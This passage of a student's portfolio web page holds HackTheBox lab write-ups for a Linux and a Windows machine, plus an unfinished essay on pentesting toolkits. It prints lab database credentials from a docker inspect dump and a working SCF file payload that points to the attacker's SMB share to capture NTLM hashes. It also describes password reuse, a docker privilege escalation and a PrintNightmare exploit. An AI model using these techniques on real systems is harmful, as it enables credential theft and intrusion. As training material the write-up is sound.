          <a href="img/portfolio/minor/red/htb_linux/HashingToolReverseShell.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/HashingToolReverseShell.png" alt=""></a>
          <a href="img/portfolio/minor/red/htb_linux/WWW-DataShell.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/WWW-DataShell.png" alt=""></a>
          <p>And we're in! I looked in the /etc/passwd and noticed another user named www-adm which
          looked like the next user I needed. After looking around for a bit and I couldn't find
          anything I thought what if they reused passwords?</p>
          <a href="img/portfolio/minor/red/htb_linux/WWW-AdmShell.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/WWW-AdmShell.png" alt=""></a>
          <p>And they did so now we have www-adm shell. After looking around I noticed a .wgetrc file
          with some credentials in it. Because it looked like docker was running on the machine I
          thought http://api:5000/ was my best bet.</p>
          <a href="img/portfolio/minor/red/htb_linux/WGETAPI.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/WGETAPI.png" alt=""></a>
          <p>And it was! Apparently there is a check_db endpoint but it required credentials. So I
          tried to credentials we've just found.</p>
          <a href="img/portfolio/minor/red/htb_linux/CatCheckDB.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/CatCheckDB.png" alt=""></a>
          <p>Looks like JSON but we first need to prettify it to make it more readable.</p>
          <pre style="text-align: left">                                <code class="prettyprint">
                                              {
             "message":{
                "AppArmorProfile":"docker-default",
                "Args":[
                   "--character-set-server=utf8mb4",
                   "--collation-server=utf8mb4_bin",
                   "--skip-character-set-client-handshake",
                   "--max_allowed_packet=50MB",
                   "--general_log=0",
                   "--sql_mode=ANSI_QUOTES,ERROR_FOR_DIVISION_BY_ZERO,IGNORE_SPACE,NO_ENGINE_SUBSTITUTION,NO_ZERO_DATE,NO_ZERO_IN_DATE,PIPES_AS_CONCAT,REAL_AS_FLOAT,STRICT_ALL_TABLES"
                ],
                "Config":{
                   "AttachStderr":false,
                   "AttachStdin":false,
                   "AttachStdout":false,
                   "Cmd":[
                      "--character-set-server=utf8mb4",
                      "--collation-server=utf8mb4_bin",
                      "--skip-character-set-client-handshake",
                      "--max_allowed_packet=50MB",
                      "--general_log=0",
                      "--sql_mode=ANSI_QUOTES,ERROR_FOR_DIVISION_BY_ZERO,IGNORE_SPACE,NO_ENGINE_SUBSTITUTION,NO_ZERO_DATE,NO_ZERO_IN_DATE,PIPES_AS_CONCAT,REAL_AS_FLOAT,STRICT_ALL_TABLES"
                   ],
                   "Domainname":"",
                   "Entrypoint":[
                      "docker-entrypoint.sh"
                   ],
                   "Env":[
                      "MYSQL_DATABASE=db",
                      "MYSQL_USER=drew",
                      "MYSQL_PASSWORD=drew",
                      "MYSQL_ROOT_PASSWORD=XeoNu86JTznxMCQuGHrGutF3Csq5",
                      "SERVICE_TAGS=dev",
                      "SERVICE_NAME=mysql",
                      "PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin",
                      "GOSU_VERSION=1.12",
                      "MYSQL_MAJOR=8.0",
                      "MYSQL_VERSION=8.0.25-1debian10"
                   ],
                   "ExposedPorts":{
                      "3306/tcp":{
          
                      },
                      "33060/tcp":{
          
                      }
                   },
                   "Healthcheck":{
                      "Interval":5000000000,
                      "Retries":3,
                      "Test":[
                         "CMD-SHELL",
                         "mysqladmin ping -h 127.0.0.1 --user=$MYSQL_USER -p$MYSQL_PASSWORD --silent"
                      ],
                      "Timeout":2000000000
                   },
                   "Hostname":"mysql",
                   "Image":"mysql:latest",
                   "Labels":{
                      "com.docker.compose.config-hash":"947cb358bc0bb20b87239b0dffe00fd463bd7e10355f6aac2ef1044d8a29e839",
                      "com.docker.compose.container-number":"1",
                      "com.docker.compose.oneoff":"False",
                      "com.docker.compose.project":"app",
                      "com.docker.compose.project.config_files":"docker-compose.yml",
                      "com.docker.compose.project.working_dir":"/root/app",
                      "com.docker.compose.service":"mysql",
                      "com.docker.compose.version":"1.29.1"
                   },
                   "OnBuild":null,
                   "OpenStdin":false,
                   "StdinOnce":false,
                   "Tty":true,
                   "User":"",
                   "Volumes":{
                      "/docker-entrypoint-initdb.d":{
          
                      },
                      "/var/lib/mysql":{
          
                      }
                   },
                   "WorkingDir":""
                },
                "Created":"2021-10-04T06:57:43.698655618Z",
                "Driver":"overlay2",
                "ExecIDs":null,
                "GraphDriver":{
                   "Data":{
                      "LowerDir":"/var/lib/docker/overlay2/15b0f0978cf938d269ad6db1a05238d1d2a86a9fc161a0c6fa9ca16a8974c55d-init/diff:/var/lib/docker/overlay2/ecc064365b0367fc58ac796d9d5fe020d9453c68e2563f8f6d4682e38231083e/diff:/var/lib/docker/overlay2/4a21c5c296d0e6d06a3e44e3fa4817ab6f6f8c3612da6ba902dc28ffd749ec4d/diff:/var/lib/docker/overlay2/f0cdcc7bddc58609f75a98300c16282d8151ce18bd89c36be218c52468b3a643/diff:/var/lib/docker/overlay2/01e8af3c602aa396e4cb5af2ed211a6a3145337fa19b123f23e36b006d565fd0/diff:/var/lib/docker/overlay2/55b88ae64530676260fe91d4d3e6b0d763165505d3135a3495677cb10de74a66/diff:/var/lib/docker/overlay2/4064491ac251bcc0b677b0f76de7d5ecf0c17c7d64d7a18debe8b5a99e73e127/diff:/var/lib/docker/overlay2/a60c199d618b0f2001f106393236ba394d683a96003a4e35f58f8a7642dbad4f/diff:/var/lib/docker/overlay2/29b638dc55a69c49df41c3f2ec0f90cc584fac031378ae455ed1458a488ec48d/diff:/var/lib/docker/overlay2/ee59a9d7b93adc69453965d291e66c7d2b3e6402b2aef6e77d367da181b8912f/diff:/var/lib/docker/overlay2/4b5204c09ec7b0cbf22d409408529d79a6d6a472b3c4d40261aa8990ff7a2ea8/diff:/var/lib/docker/overlay2/8178a3527c2a805b3c2fe70e179797282bb426f3e73e8f4134bc2fa2f2c7aa22/diff:/var/lib/docker/overlay2/76b10989e43e43406fc4306e789802258e36323f7c2414e5e1242b6eab4bd3eb/diff",
                      "MergedDir":"/var/lib/docker/overlay2/15b0f0978cf938d269ad6db1a05238d1d2a86a9fc161a0c6fa9ca16a8974c55d/merged",
                      "UpperDir":"/var/lib/docker/overlay2/15b0f0978cf938d269ad6db1a05238d1d2a86a9fc161a0c6fa9ca16a8974c55d/diff",
                      "WorkDir":"/var/lib/docker/overlay2/15b0f0978cf938d269ad6db1a05238d1d2a86a9fc161a0c6fa9ca16a8974c55d/work"
                   },
                   "Name":"overlay2"
                },
                "HostConfig":{
                   "AutoRemove":false,
                   "Binds":[
                      "/root/app/scripts/init.d:/docker-entrypoint-initdb.d:ro",
                      "app_vol_mysql:/var/lib/mysql:rw"
                   ],
                   "BlkioDeviceReadBps":null,
                   "BlkioDeviceReadIOps":null,
                   "BlkioDeviceWriteBps":null,
                   "BlkioDeviceWriteIOps":null,
                   "BlkioWeight":0,
                   "BlkioWeightDevice":null,
                   "CapAdd":[
                      "SYS_NICE"
                   ],
                   "CapDrop":null,
                   "Cgroup":"",
                   "CgroupParent":"",
                   "CgroupnsMode":"host",
                   "ConsoleSize":[
                      0,
                      0
                   ],
                   "ContainerIDFile":"",
                   "CpuCount":0,
                   "CpuPercent":0,
                   "CpuPeriod":0,
                   "CpuQuota":0,
                   "CpuRealtimePeriod":0,
                   "CpuRealtimeRuntime":0,
                   "CpuShares":0,
                   "CpusetCpus":"",
                   "CpusetMems":"",
                   "DeviceCgroupRules":null,
                   "DeviceRequests":null,
                   "Devices":null,
                   "Dns":null,
                   "DnsOptions":null,
                   "DnsSearch":null,
                   "ExtraHosts":null,
                   "GroupAdd":null,
                   "IOMaximumBandwidth":0,
                   "IOMaximumIOps":0,
                   "IpcMode":"private",
                   "Isolation":"",
                   "KernelMemory":0,
                   "KernelMemoryTCP":0,
                   "Links":null,
                   "LogConfig":{
                      "Config":{
          
                      },
                      "Type":"json-file"
                   },
                   "MaskedPaths":[
                      "/proc/asound",
                      "/proc/acpi",
                      "/proc/kcore",
                      "/proc/keys",
                      "/proc/latency_stats",
                      "/proc/timer_list",
                      "/proc/timer_stats",
                      "/proc/sched_debug",
                      "/proc/scsi",
                      "/sys/firmware"
                   ],
                   "Memory":0,
                   "MemoryReservation":0,
                   "MemorySwap":0,
                   "MemorySwappiness":null,
                   "NanoCpus":0,
                   "NetworkMode":"app_nw",
                   "OomKillDisable":false,
                   "OomScoreAdj":0,
                   "PidMode":"",
                   "PidsLimit":null,
                   "PortBindings":{
          
                   },
                   "Privileged":false,
                   "PublishAllPorts":false,
                   "ReadonlyPaths":[
                      "/proc/bus",
                      "/proc/fs",
                      "/proc/irq",
                      "/proc/sys",
                      "/proc/sysrq-trigger"
                   ],
                   "ReadonlyRootfs":false,
                   "RestartPolicy":{
                      "MaximumRetryCount":0,
                      "Name":"always"
                   },
                   "Runtime":"runc",
                   "SecurityOpt":null,
                   "ShmSize":67108864,
                   "UTSMode":"",
                   "Ulimits":null,
                   "UsernsMode":"",
                   "VolumeDriver":"",
                   "VolumesFrom":[
          
                   ]
                },
                "HostnamePath":"/var/lib/docker/containers/47c78eb0450f08b91f8e1c587c98f4e2b4e5ac4b4c26c6a0a3283bc67d5df216/hostname",
                "HostsPath":"/var/lib/docker/containers/47c78eb0450f08b91f8e1c587c98f4e2b4e5ac4b4c26c6a0a3283bc67d5df216/hosts",
                "Id":"47c78eb0450f08b91f8e1c587c98f4e2b4e5ac4b4c26c6a0a3283bc67d5df216",
                "Image":"sha256:5c62e459e087e3bd3d963092b58e50ae2af881076b43c29e38e2b5db253e0287",
                "LogPath":"/var/lib/docker/containers/47c78eb0450f08b91f8e1c587c98f4e2b4e5ac4b4c26c6a0a3283bc67d5df216/47c78eb0450f08b91f8e1c587c98f4e2b4e5ac4b4c26c6a0a3283bc67d5df216-json.log",
                "MountLabel":"",
                "Mounts":[
                   {
                      "Destination":"/docker-entrypoint-initdb.d",
                      "Mode":"ro",
                      "Propagation":"rprivate",
                      "RW":false,
                      "Source":"/root/app/scripts/init.d",
                      "Type":"bind"
                   },
                   {
                      "Destination":"/var/lib/mysql",
                      "Driver":"local",
                      "Mode":"rw",
                      "Name":"app_vol_mysql",
                      "Propagation":"",
                      "RW":true,
                      "Source":"/var/lib/docker/volumes/app_vol_mysql/_data",
                      "Type":"volume"
                   }
                ],
                "Name":"/mysql",
                "NetworkSettings":{
                   "Bridge":"",
                   "EndpointID":"",
                   "Gateway":"",
                   "GlobalIPv6Address":"",
                   "GlobalIPv6PrefixLen":0,
                   "HairpinMode":false,
                   "IPAddress":"",
                   "IPPrefixLen":0,
                   "IPv6Gateway":"",
                   "LinkLocalIPv6Address":"",
                   "LinkLocalIPv6PrefixLen":0,
                   "MacAddress":"",
                   "Networks":{
                      "app_nw":{
                         "Aliases":[
                            "47c78eb0450f",
                            "mysql"
                         ],
                         "DriverOpts":null,
                         "EndpointID":"50037fb137fd880f88a9efd17eb8cf94bf8142ec263080b4c904afeeaa79aa2e",
                         "Gateway":"172.18.0.1",
                         "GlobalIPv6Address":"",
                         "GlobalIPv6PrefixLen":0,
                         "IPAMConfig":{
                            "IPv4Address":"172.18.0.100"
                         },
                         "IPAddress":"172.18.0.100",
                         "IPPrefixLen":16,
                         "IPv6Gateway":"",
                         "Links":null,
                         "MacAddress":"02:42:ac:12:00:64",
                         "NetworkID":"021b24b8b3e1e3638463eeb7dc9af59c36cc412578cdf51931a24f04ea6f5532"
                      }
                   },
                   "Ports":{
                      "3306/tcp":null,
                      "33060/tcp":null
                   },
                   "SandboxID":"99cbb57fded2142e5dad46330b43249d2866f8514fb4342d06322f3e3b5c60f1",
                   "SandboxKey":"/var/run/docker/netns/99cbb57fded2",
                   "SecondaryIPAddresses":null,
                   "SecondaryIPv6Addresses":null
                },
                "Path":"docker-entrypoint.sh",
                "Platform":"linux",
                "ProcessLabel":"",
                "ResolvConfPath":"/var/lib/docker/containers/47c78eb0450f08b91f8e1c587c98f4e2b4e5ac4b4c26c6a0a3283bc67d5df216/resolv.conf",
                "RestartCount":0,
                "State":{
                   "Dead":false,
                   "Error":"",
                   "ExitCode":0,
                   "FinishedAt":"0001-01-01T00:00:00Z",
                   "Health":{
                      "FailingStreak":0,
                      "Log":[
                         {
                            "End":"2021-10-04T17:08:01.998027574+02:00",
                            "ExitCode":0,
                            "Output":"mysqladmin: [Warning] Using a password on the command line interface can be insecure.\nmysqld is alive\n",
                            "Start":"2021-10-04T17:08:01.908189033+02:00"
                         },
                         {
                            "End":"2021-10-04T17:08:07.080804898+02:00",
                            "ExitCode":0,
                            "Output":"mysqladmin: [Warning] Using a password on the command line interface can be insecure.\nmysqld is alive\n",
                            "Start":"2021-10-04T17:08:07.000613396+02:00"
                         },
                         {
                            "End":"2021-10-04T17:08:12.166584919+02:00",
                            "ExitCode":0,
                            "Output":"mysqladmin: [Warning] Using a password on the command line interface can be insecure.\nmysqld is alive\n",
                            "Start":"2021-10-04T17:08:12.083845791+02:00"
                         },
                         {
                            "End":"2021-10-04T17:08:17.254375293+02:00",
                            "ExitCode":0,
                            "Output":"mysqladmin: [Warning] Using a password on the command line interface can be insecure.\nmysqld is alive\n",
                            "Start":"2021-10-04T17:08:17.16894306+02:00"
                         },
                         {
                            "End":"2021-10-04T17:08:22.350400823+02:00",
                            "ExitCode":0,
                            "Output":"mysqladmin: [Warning] Using a password on the command line interface can be insecure.\nmysqld is alive\n",
                            "Start":"2021-10-04T17:08:22.257747436+02:00"
                         }
                      ],
                      "Status":"healthy"
                   },
                   "OOMKilled":false,
                   "Paused":false,
                   "Pid":1108,
                   "Restarting":false,
                   "Running":true,
                   "StartedAt":"2021-10-04T06:57:47.409835076Z",
                   "Status":"running"
                }
             },
             "status":200
          }
                                          </code>
                                      </pre>
          <p>Looks like an username and some passwords lets try those with ssh.</p>
          <a href="img/portfolio/minor/red/htb_linux/UserFlag.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/UserFlag.png" alt=""></a>
          <p>We got the user flag! But now we need to find something to escalate our privileges. We
          could use LinPEAS to try and find something but we first have to get it on this
          machine.</p>
          <a href="img/portfolio/minor/red/htb_linux/SimpleHTTPServer.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/SimpleHTTPServer.png" alt=""></a>
          <a href="img/portfolio/minor/red/htb_linux/WGETLinpeas.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/WGETLinpeas.png" alt=""></a>
          <p>I used SimpleHTTPServer to get LinPeas from my machine to the target machine because the
          target machine didn't have access to the internet. Now we need to run LinPEAS.</p>
          <a href="img/portfolio/minor/red/htb_linux/LinpeasMail.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/LinpeasMail.png" alt=""></a>
          <a href="img/portfolio/minor/red/htb_linux/LinpeasDockerIP.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/LinpeasDockerIP.png" alt=""></a>
          <a href="img/portfolio/minor/red/htb_linux/LinpeasDockerFolder.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/LinpeasDockerFolder.png" alt=""></a>
          <p>Looks like LinPEAS found some interesting stuff like a mail message to Drew and the
          docker ip ranges and a docker folder that is edited regularly.</p>
          <a href="img/portfolio/minor/red/htb_linux/Mail.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/Mail.png" alt=""></a>
          <p>This probably means that the docker folder that gets edited regularly is the folder
          containing the game. And that some script is running that we could use.</p>
          <a href="img/portfolio/minor/red/htb_linux/DrewPublicKey.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/DrewPublicKey.png" alt=""></a>
          <p>Looks like we got a public key as game-tester as well. Lets try to login into the docker
          ips using this public key.</p>
          <a href="img/portfolio/minor/red/htb_linux/Game-testerShell.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/Game-testerShell.png" alt=""></a>
          <a href="img/portfolio/minor/red/htb_linux/SharedFolderGame-tester.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/SharedFolderGame-tester.png" alt=""></a>
          <a href="img/portfolio/minor/red/htb_linux/SharedFolderDrew.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/SharedFolderDrew.png" alt=""></a>
          <p>And it worked now we got a shell as game-tester as well on a docker container. I noticed
          that the same docker folder on Drew also exists on the docker container and that they
          are shared. I also noticed that the docker folder get rewritten entirely so all files
          inside get removed and replaced before the server is restarted again. Lets see what the
          script does.</p>
          <a href="img/portfolio/minor/red/htb_linux/CatNode-server.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/CatNode-server.png" alt=""></a>
          <p>It runs in a folder called /usr/src/app which doesn't exist on the Drew user but it does
          on the game-tester container. So lets look at that as well.</p>
          <a href="img/portfolio/minor/red/htb_linux/CatServerJS.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/CatServerJS.png" alt=""></a>
          <p>Look like we can crash the server if we make a POST to autoplay with a decimal instead of
          an integer. But that doesn't get us anywhere we need to infect the node-server.sh
          first.</p>
          <a href="img/portfolio/minor/red/htb_linux/DrewPublicKey.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/DrewPublicKey.png" alt=""></a>
          <p>I found this <a href="https://book.hacktricks.xyz/linux-unix/privilege-escalation/docker-breakout">website</a>
          explaining priv esc with docker so I gave it a try. But I have to be faster than the
          server can create the node-server.sh in order to infect it. So I created a script.</p>
          <a href="img/portfolio/minor/red/htb_linux/RogueNode-server.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/RogueNode-server.png" alt=""></a>
          <a href="img/portfolio/minor/red/htb_linux/ExploitLoop.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/ExploitLoop.png" alt=""></a>
          <p>This should create a bash file in /tmp on the game-tester container that is executable by
          game-tester in order to priv esc. So lets crash the server and try it.</p>
          <a href="img/portfolio/minor/red/htb_linux/ExploitRun.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/ExploitRun.png" alt=""></a>
          <a href="img/portfolio/minor/red/htb_linux/CrashGameServer.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/CrashGameServer.png" alt=""></a>
          <p>I had to give it a few tries in order to succeed because in some cases the server was
          actually faster than my script.</p>
          <a href="img/portfolio/minor/red/htb_linux/RootOnDocker.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/RootOnDocker.png" alt=""></a>
          <p>And it worked now we need to do the same thing in order to get root on the Drew machine
          but this time we don't have to worry about speed because we don't need to infect a
          script, we just have to do it fast enough before all the files inside the folder get
          deleted again.</p>
          <a href="img/portfolio/minor/red/htb_linux/InfectBashAsGame-tester.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/InfectBashAsGame-tester.png" alt=""></a>
          <a href="img/portfolio/minor/red/htb_linux/RootFlag.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/RootFlag.png" alt=""></a>
          <p>That's it! We are root and got the flag!</p>
          <p>Although it took me quite a while to root this machine it was a really fun one.
          Containing a lot of different exploits mostly straight from the OWASP top 10 but also
          some I never heard of before like the docker priv esc.</p>
           <ul class="list-inline">
          <li>Date: October 2021</li>
          <li>Client: Fontys</li>
          <li>Category: Minor Red-teaming</li>
          </ul>
          <button class="btn btn-primary" data-dismiss="modal" type="button">
          <i class="fas fa-times"></i>
          Close Project
          </button>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          
          <div class="portfolio-modal modal fade" id="portfolioModal22" tabindex="-1" role="dialog" aria-hidden="true">
          <div class="modal-dialog">
          <div class="modal-content">
          <div class="close-modal" data-dismiss="modal">
          <div class="lr">
          <div class="rl"></div>
          </div>
          </div>
          <div class="container">
          <div class="row">
          <div class="col-lg-8 mx-auto">
          <div class="modal-body">
          
          <h2 class="text-uppercase">Fontys S7</h2>
          <p class="item-intro text-muted">HackTheBox Windows Write-up</p>
          <a href="img/portfolio/minor/red/htb_windows/DriverCard.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_windows/DriverCard.png" alt=""></a>
          <p>First lets start with the basic enumeration and do a NMap.</p>
          <a href="img/portfolio/minor/red/htb_windows/NMapOutput.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_windows/NMapOutput.png" alt=""></a>
          <p>When navigating to the webpage we are greeted by a login screen. After some searching and
          not finding anything useful I tried to login with just a default password admin:admin it
          was a longshot but it worked!</p>
          <a href="img/portfolio/minor/red/htb_windows/Dashboard.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_windows/Dashboard.png" alt=""></a>
          <p>The only button that worked on the website was Firmware updates where you can upload a
          file. Knowing that SMB was also an open port I found this <a href="https://pentestlab.blog/2017/12/13/smb-share-scf-file-attacks/">website</a>
          this could potentially it so lets try it out.
          </p>
          <pre style="text-align: left">                                <code class="prettyprint">
                                              [Shell]
                                              Command=2
                                              Iconfile=\\10.10.14.161\share\test.ico
                                              [Taskbar]
                                              Command=ToggleDesktop
                                          </code>
                                      </pre>
          <a href="img/portfolio/minor/red/htb_windows/ResponderOutput.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_windows/ResponderOutput.png" alt=""></a>
          <p>I created a payload like the example given on the site I found started responder and got
          a few hits. Now we know the username and maybe the password if we manage to crack
          it. We know from the responder output that it is a NTLM hash so lets put Hashcat on it
          and see what we'll get.</p>
          <a href="img/portfolio/minor/red/htb_windows/HashcatOutput.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_windows/HashcatOutput.png" alt=""></a>
          <p>Hashcat cracked the password with ease and now we can take a look at the SMB folder to
          see if we can find anything interesting.</p>
          <a href="img/portfolio/minor/red/htb_windows/SMBMap.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_windows/SMBMap.png" alt=""></a>
          <p>We didn't find anything interesting but knowing from the NMap output we also know that
          the RDP port is open so maybe it uses the same password.</p>
          <a href="img/portfolio/minor/red/htb_windows/UserFlag.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_windows/UserFlag.png" alt=""></a>
          <p>This was indeed the case and now we already have the user flag. For priv esc running at
          least WinPEAS is a no-brainer. So I used SimpleHTTPServer to get WinPEAS on the target
          machine.</p>
          <a href="img/portfolio/minor/red/htb_windows/SimpleHTTPServer.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_windows/SimpleHTTPServer.png" alt=""></a>
          <a href="img/portfolio/minor/red/htb_windows/WgetWinpeas.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_windows/WgetWinpeas.png" alt=""></a>
          <a href="img/portfolio/minor/red/htb_windows/ProcessPrintSpool.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_windows/ProcessPrintSpool.png" alt=""></a>
          <p>Really the only interesting thing WinPEAS found was a Print spooler process. After some
          Googling I stubled across <a href="https://github.com/calebstewart/CVE-2021-1675">this</a> CVE. So lets get
          that exploit on the target machine in the same way we did with WinPEAS.</p>
          <a href="img/portfolio/minor/red/htb_windows/WgetPrintNightmare.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_windows/WgetPrintNightmare.png" alt=""></a>
          <p>I wasn't able to run the script because of some permission issues, but after some
          Googling I found out I could just set the policy to unrestricted.</p>
          <a href="img/portfolio/minor/red/htb_windows/RunExploit.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_windows/RunExploit.png" alt=""></a>
          <p>I ran the exploit and it created a new administrator account for me with a username and
          password that I chose and know. Now the only thing that's left is just to logout as this
           user and login with our new user.</p>
          <a href="img/portfolio/minor/red/htb_windows/RootFlag.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_windows/RootFlag.png" alt=""></a>
          <p>And that's it! We have the root flag! This box wasn't that hard but still fun and
          sometimes challenging due to my lack of knowledge of Windows hacking. Overall a fun
          learning experience.</p>
          <ul class="list-inline">
          <li>Date: October 2021</li>
          <li>Client: Fontys</li>
          <li>Category: Minor Red-teaming</li>
          </ul>
          <button class="btn btn-primary" data-dismiss="modal" type="button">
          <i class="fas fa-times"></i>
          Close Project
          </button>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          
          <div class="portfolio-modal modal fade" id="portfolioModal23" tabindex="-1" role="dialog" aria-hidden="true">
          <div class="modal-dialog">
          <div class="modal-content">
          <div class="close-modal" data-dismiss="modal">
          <div class="lr">
          <div class="rl"></div>
          </div>
          </div>
          <div class="container">
          <div class="row">
          <div class="col-lg-8 mx-auto">
          <div class="modal-body">
          
          <h2 class="text-uppercase">EMPLOYER</h2>
          <p class="item-intro text-muted">TITLE GOES HERE</p>
          <p>DESCRIPTION GOES HERE</p>
          <a href="PICTURE"><img class="img-fluid d-block mx-auto" src="SOURCE" alt=""></a>
          <ul class="list-inline">
          <li>Date: DATE</li>
          <li>Client: CLIENT</li>
          <li>Category: CATEGORY</li>
          </ul>
          <button class="btn btn-primary" data-dismiss="modal" type="button">
          <i class="fas fa-times"></i>
          Close Project
          </button>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          
          <div class="portfolio-modal modal fade" id="portfolioModal24" tabindex="-1" role="dialog" aria-hidden="true">
          <div class="modal-dialog">
          <div class="modal-content">
          <div class="close-modal" data-dismiss="modal">
          <div class="lr">
          <div class="rl"></div>
          </div>
          </div>
          <div class="container">
          <div class="row">
          <div class="col-lg-8 mx-auto">
          <div class="modal-body">
          
          <h2 class="text-uppercase">EMPLOYER</h2>
          <p class="item-intro text-muted">TITLE GOES HERE</p>
          <p>DESCRIPTION GOES HERE</p>
          <a href="PICTURE"><img class="img-fluid d-block mx-auto" src="SOURCE" alt=""></a>
          <ul class="list-inline">
          <li>Date: DATE</li>
          <li>Client: CLIENT</li>
          <li>Category: CATEGORY</li>
          </ul>
          <button class="btn btn-primary" data-dismiss="modal" type="button">
          <i class="fas fa-times"></i>
          Close Project
          </button>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          
          <div class="portfolio-modal modal fade" id="portfolioModal25" tabindex="-1" role="dialog" aria-hidden="true">
          <div class="modal-dialog">
          <div class="modal-content">
          <div class="close-modal" data-dismiss="modal">
          <div class="lr">
          <div class="rl"></div>
          </div>
          </div>
          <div class="container">
          <div class="row">
          <div class="col-lg-8 mx-auto">
          <div class="modal-body">
          
          <h2 class="text-uppercase">Fontys S7</h2>
          <p class="item-intro text-muted">My personal pen-testing toolboxes</p>
          <p>Like every other profession good tools make a world of difference on the quality and
          efficiency of the end product. This isn't any different with cyber security. Good tools
          can improve results providing you with more information and helping with getting to the
          results faster.</p>
          <h3>On the road</h3>
          <a href="img/portfolio/minor/red/kalilinux.jpg"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/kalilinux.jpg" alt=""></a>
          <p>On the road when I'm on my laptop I like to use Kali Linux. It's just convenient that it
          comes pre-loaded with all the tools you need, and it runs fairly lightweight on older
          laptops. The "kali-undercover" command is also a fun little gimmick that changes your
          Kali desktop to a Windows clone which for a random passer by looks just like a regular
          Windows machine. Making it incognito to use Kali whenever you're in a public space and
          want to keep a low profile.</p>
          <h3>At home</h3>
          <a href="img/portfolio/minor/red/parrotos.jpg"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/parrotos.jpg" alt=""></a>
          <p>At home on my main desktop PC I recently switched to natively running ParrotOS. This was
          because I liked to try something new and the reviews were good. It comes pre-loaded with
          the same tools as kali and a few extra tools like diverting all traffic trough tor
          making the machine even more anonymous. The user experience is a little better and just
          overall a good looking distro. This comes at a cost because it takes more resources to
          run. This isn't a problem on my PC because it's quite powerful and I don't have to think
          about battery life. Alongside ParrotOS I run a Windows VM in qemu with WinApps running
          on Linux which enables me to run any Windows application I want on Linux. I mostly use
          it for Microsoft Office products.</p>
          <h3>Cloud</h3>
          <a href="img/portfolio/minor/red/googlecloudconsole.PNG"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/googlecloudconsole.PNG" alt=""></a>
          <p>Google cloud console is an awesome way to always have a Linux machine at your disposal
          where ever you are. It's fully cloud based and free to use. So when you're in need of a
          Linux terminal and you have access to a browser you're set. The only downside is that
          the machine is volatile so when you shut it down it is gone. This requires you to always
          re-install tools and such. Luckily due to it running on Google cloud it is pretty fast.
          Just overall a good tool to know about.</p>
          <a href="img/portfolio/minor/red/guacamole.PNG"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/guacamole.PNG" alt=""></a>
          <p>Now Guacamole is kinda like Google cloud console, but it's self-hosted. It can turn any
          machine with a SSH server into a cloud based web terminal accessible from any browser
          where ever you are. It takes a little time and effort to set it up but it is worth it.
          All the benefits from Google cloud console but your data is hosted by you and it is
          saved. In my case I installed Kali Linux on a docker server and now I can access it
          whenever I need to it doesn't matter if I'm on Windows, Linux or even my phone.</p>
          <a href="img/portfolio/minor/red/guacamoleconsole.PNG"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/guacamoleconsole.PNG" alt=""></a>
          <h3>Windows</h3>
          <a href="img/portfolio/minor/red/wsl.jpg"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/wsl.jpg" alt=""></a>
          <p>Whenever I'm using Windows and need to do a quick little task that requires Linux I don't
          want to reboot and boot into Linux because it's a hassle. That's when I use WSL. WSL
          stands for Windows Subsystem for Linux and it works great. It's not everything for
          example network related stuff is not possible due to WSL not having direct access to the
          network card but for other simple stuff it works great. And if I need to do a quick
